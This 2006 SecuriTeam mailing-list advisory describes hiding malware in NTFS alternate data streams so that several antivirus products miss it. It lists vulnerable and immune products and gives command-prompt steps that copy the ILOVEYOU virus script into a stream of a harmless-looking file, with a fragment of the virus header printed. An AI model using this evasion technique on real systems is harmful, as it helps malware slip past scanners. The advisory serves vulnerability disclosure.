[NT] NTFS Data Stream Malware Stealth Technique
- From: SecuriTeam <support@xxxxxxxxxxxxxx>
- Date: 5 Jun 2006 18:06:20 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
NTFS Data Stream Malware Stealth Technique
------------------------------------------------------------------------
SUMMARY
Streams, are a concept that exists in a NTFS file system which represents
a property of a file. Within a stream, it is possible to hide information
of any size, where the existence of this information is not shown in the
file system. The only way to extract that information is to know the
stream's name.
DETAILS
Vulnerable Systems:
* Panda Software. All products.
* ClamWin. All versions.
* Norman Virus Control. All versions.
* AVG Antivirus.
Immune Systems:
* Mcaffe / Computer Associates
* Avira Antivir PersonalEdition Classic
It isn't in any way a new technique, the first proof of concept of hidding
malware into an NTFS data stream was published at 2000. Apparently the
technique wasn't so popular and due to this fact the 75% (or more) of the
anti-virus industry have been ignore it.
The technique is as simple as follow. Download a virus file, even an old
one. Call it, in example, 'iloveyou.vbs'. Next, go to a command prompt:
C:\>echo I'm an inocent file. > file.txt
C:\>type file.txt
I'm an inocent file.
C:\>dir
Volume in drive C has no label.
Volume Serial Number is 8475-DDEF
Directory of C:\
06/03/2006 01:10 <DIR> Documents and Settings
03/06/2006 05:10 23 file.txt
03/06/2006 04:52 10.320 iloveyou.txt
03/06/2006 04:52 10.320 iloveyou.vbs
26/12/2005 00:51 <DIR> Inetpub
03/06/2006 05:09 <DIR> Program Files
29/05/2006 23:24 12 test1.vbs
03/06/2006 05:06 <DIR> WINNT
4 File(s) 20.675 bytes
4 Dir(s) 2.539.368.448 bytes free
C:\>type iloveyou.vbs > file.txt:virus.vbs
C:\>type file.txt
I'm an inocent file.
C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@xxxxxxxx / @GRAMMERSoft Group /
(...)
---More---
Now, try scanning your system with your preferred vulnerable antivirus
product. The first file in a normal data stream 'iloveyou.vbs' will
(surely) be detected but not the copy of it stored in an alternate data
stream of the apparently innocent file c:\file.txt.
ADDITIONAL INFORMATION
The information has been provided by <mailto:joxeankoret@xxxxxxxx> Joxean
Koret.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Prev by Date: [NEWS] Quake 3 Engine Client Buffer Overflow
- Next by Date: [REVS] Advanced Topics on SQL Injection Protection
- Previous by thread: [NEWS] Quake 3 Engine Client Buffer Overflow
- Next by thread: [REVS] Advanced Topics on SQL Injection Protection
- Index(es):
Relevant Pages
|
